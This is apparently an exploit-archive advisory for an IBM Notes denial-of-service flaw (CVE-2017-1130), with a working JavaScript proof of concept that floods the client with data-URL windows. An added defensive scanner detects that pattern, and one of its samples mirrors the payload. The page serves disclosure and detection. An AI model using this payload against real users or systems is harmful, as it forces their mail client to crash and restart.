IBM Notes 8.5.x / 9.0.x Denial Of Service

IBM Notes versions 8.5.x and 9.0.x suffer from a denial of service vulnerability.

MD5 | 5962a5618ef528d19dbaa50818de00f6

# Exploit Title: IBM Notes is affected by a denial of service vulnerability
# Date: 31 August 2017
# Software Link:
# Exploit Author: Dhiraj Mishra
# Contact:
# Website:
# CVE: CVE-2017-1130
# Category: IBM Notes (Console Application)

1. Description

IBM Notes is vulnerable to a denial of service: if a user is persuaded to click on a malicious link, the client ultimately has to be restarted.

2. Proof of concept

var w;
var wins = {};
var i = 1;
setInterval("", 1);
setInterval(function () {
    for (var k in wins) {
        // after creating window .status = '' (empty string), when the file dialog is displayed its value changes to 'undefined'.
        if (wins[k] && wins[k].status === undefined) {
            delete wins[k];
        }
    }
    w = open('data:text/html,<input type=file id=f><script>;setInterval("", 1);<\/script>');
    if (w) {
        wins[i] = w;
    }
}, 1);
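
A defender-side triage heuristic for the traits visible in the proof of concept above (1 ms timers combined with open() of an inline data: document that contains a file input). It is an added example, not part of the advisory or of any IBM tooling. The function names, finding labels and the FAST_TIMER_MS threshold are assumptions, and both samples are constructed.

```javascript
// Added example: static triage heuristic, not code from the advisory.
// FAST_TIMER_MS and the finding names are assumptions chosen for this sketch.
const FAST_TIMER_MS = 4;

// Collect the literal delay of every setInterval call (NaN when not a number).
function intervalDelays(src) {
  const delays = [];
  const call = /\bsetInterval\s*\(/g;
  while (call.exec(src) !== null) {
    let depth = 1, quote = null, lastComma = -1, i = call.lastIndex;
    for (; i < src.length && depth > 0; i++) {
      const c = src[i];
      if (quote) {
        if (c === "\\") i++; // skip the escaped character
        else if (c === quote) quote = null;
      } else if (c === '"' || c === "'" || c === "`") quote = c;
      else if (c === "/" && src[i + 1] === "/") { const nl = src.indexOf("\n", i); i = nl < 0 ? src.length : nl; }
      else if ("([{".includes(c)) depth++;
      else if (")]}".includes(c)) depth--;
      else if (c === "," && depth === 1) lastComma = i;
    }
    if (depth !== 0 || lastComma < 0) continue; // unterminated call or no delay
    const arg = src.slice(lastComma + 1, i - 1).trim();
    delays.push(/^\d+$/.test(arg) ? Number(arg) : NaN);
  }
  return delays;
}

// Flag scripts that pair near-zero timers with open() of an inline data:
// document carrying a file input, the combination visible in the PoC text.
function assessScript(src) {
  const findings = [];
  const fast = intervalDelays(src).filter((d) => d <= FAST_TIMER_MS).length;
  if (fast) findings.push("fast-interval");
  const m = /\bopen\s*\(\s*(['"`])data:text\/html,(.*?)\1\s*\)/is.exec(src);
  if (m) {
    findings.push("open-data-url");
    if (/<input\b[^>]*\btype\s*=\s*["']?file\b/i.test(m[2])) findings.push("file-input-in-child");
    if (/<script\b/i.test(m[2])) findings.push("script-in-child");
  }
  return { findings, suspicious: fast > 0 && findings.includes("file-input-in-child") };
}

// Constructed samples: the first mirrors the shape of the PoC text on this page.
const SAMPLE_POC = String.raw`setInterval(function () {
  w = open('data:text/html,<input type=file id=f><script>;setInterval("", 1);<\/script>');
  if (w) { wins[i] = w; }
}, 1);`;
const SAMPLE_BENIGN = 'setInterval(refresh, 30000); window.open("https://example.com/help");';
```

The scanner is a triage aid for HTML or script content before it reaches a client; it does not parse JavaScript fully, so obfuscated or computed delays come back as NaN and are not counted.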

3. IBM Security Bulletin
